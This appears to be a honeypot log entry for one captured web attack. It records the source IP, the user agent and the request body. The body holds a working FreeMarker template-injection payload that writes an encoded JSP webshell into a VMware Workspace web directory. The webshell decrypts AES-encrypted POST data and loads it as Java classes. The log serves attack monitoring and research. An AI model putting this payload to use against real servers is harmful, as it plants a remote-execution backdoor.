Attack a50c6f7c-e29f-4a1e-a14b-7bfec7c4691b
Details
ID |
a50c6f7c-e29f-4a1e-a14b-7bfec7c4691b |
Attack Type |
elasticsearch |
IP Address |
75.127.11.24 |
Username |
|
Password |
|
Client Version |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40 |
Country |
United States |
Date |
2023-06-04 08:48PM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "*/*",
"Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
"Accept-Encoding": "gzip, deflate"
},
"hostname": "localhost",
"form_data": {
"error": "",
"deviceType": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/1NsKqC3.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525253C%25252525%25252540page%25252Bimport%2525253D%2525255C%25252522java.util.%2525252A%2525252Cjavax.crypto.%2525252A%2525252Cjavax.crypto.spec.%2525252A%2525255C%25252522%25252525%2525253E%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525253C%25252525%25252521%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bclass%25252BU%25252Bextends%25252BClassLoader%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252BU%25252528ClassLoader%25252Bc%25252529%25252B%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bsuper%25252528c%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525257D%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bpublic%25252BClass%25252Bg%25252528byte%25252B%2525255B%2525255Db%25252529%25252B%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Breturn%25252Bsuper.defineClass%25252528b%2525252C0%2525252Cb.length%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525257D%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525257D%25252525%2525253E%2525253C%25252525%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bif%25252B%25252528request.getMethod%25252528%25252529.equals%25252528%2525255C%25252522POST%2525255C%25252522%25252529%25252529%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252BString%25252Bk%2525253D%2525255C%25252522e45e329feb5d925b%2525255C%25252522%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bsession.putValue%25252528%2525255C%25252522u%2525255C%25252522%2525252Ck%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252BCipher%25252Bc%2525253DCipher.getInstance%25252528%2525255C%25252522AES%2525255C%25252522%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bc.init%252525282%2525252Cnew%25252BSecretKeySpec%25252528k.getBytes%25252528%25252529%2525252C%2525255C%25252522AES%2525255C%25252522%25252529%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bnew%25252BU%25252528this.getClass%25252528%25252529.getClassLoader%25252528%25252529%25252529.g%25252528c.doFinal%25252528new%25252Bsun.misc.BASE64Decoder%25252528%25252529.decodeBuffer%25252528request.getReader%25252528%25252529.readLine%25252528%25252529%25252529%25252529%25252529.newInstance%25252528%25252529.equals%25252528pageContext%25252529%2525253B%2525257D%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252525%2525253E%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525253C%25252525out.println%25252528%2525255C%25252522e8418d1d706cd73548f9f16f1d55ad6e%2525255C%25252522%25252529%25252B%2525253B%25252525%2525253E\").getBytes())}"
}
}